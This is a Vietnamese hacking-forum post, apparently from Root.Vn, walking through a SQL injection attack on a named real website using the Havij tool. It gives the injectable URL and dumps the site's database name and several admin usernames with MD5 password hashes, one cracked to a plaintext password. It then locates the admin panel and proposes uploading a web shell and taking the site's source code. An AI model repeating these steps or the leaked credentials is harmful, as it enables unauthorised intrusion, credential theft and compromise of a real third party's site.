Bắt đầu nào
Site victim: BenVung.Vn
Hôm nay mình sẽ hướng dẫn cho các bạn trên diễn đàn Root.Vn cách get admin và pass của các site lỗi SQL injec bằng Havij.Đầu tiên các bạn tải hai công cụ này về máy
Đầu tiên các bạn tải Havij phiên bản mới nhất: Tại Đây
Phần mềm tìm link admin Admin Finder: Tại Đây
Video hướng dẫn hack web bằng havij
Mình có một site demo: BenVung.Vn
![[IMG]](http://root.vn/up/hack-web-bang-havij.png)
Bắt đầu nào
http://benvung.vn/?do=products&act=list&cid=23' ----> Lỗi
Current DB: benvung_data
data
Tiếp đến nhấn vào table chọn get table
Nó đã show ra phần user trong số các table vừa get
Chúng ta chú ý vào table admin:
Tiến hành get colum chúng ta chú ý đến table user và pass:
Tích vào 2 dòng đó nhấn tiếp vào get data
Vậy là ta đã có user và pass md5 mã hóa
Data Found: username=admin
Data Found: password=e10adc3949ba59abbe56e057f20f883e
Data Found: username=benvungadmin
Data Found: password=32a87cc148bdd8a99a4d65e109abec64
Data Found: username=benvunggroup
Data Found: password=8f947e04be61a0b7f4dbdae5a3941118
Tiến hành crcak md5 pass:
Data Found: username=admin
Data Found: password=e10adc3949ba59abbe56e057f20f883e =123456
Đã xong vậy là ta đã có pass của user: admin
Tiếp đấy tìm link đang nhập admin
ở đây mình hướng dẫn các bạn sử dụng adminfinder Tùy từng trường hợp mà sử dụng các phương pháp khác nhau
Dựa vào code,mò link admin vv
Với admin finder mục url oánh link site bào.Nhấn start và chờ đợi thôi
Ô ô...đây rồi: Link admin đây: http://benvung.vn/admin.php
giờ thì thử pass nào
Giow tgif up shell lên sau đó thì leech code về thôi.....!
Read more: http://root.vn/threads/huong-dan-hack-web-benvung-vn-loi-sql-injection-bang-havij.3398/#ixzz3ASO2yhHV
Đặt làm trang chủ
Giới thiệu
E-mail: admin@tenmiencuaban.com
Liên hệ Quảng cáo
Tuyển cộng tác viên
Đường dây nóng 0123.45.67.89
Top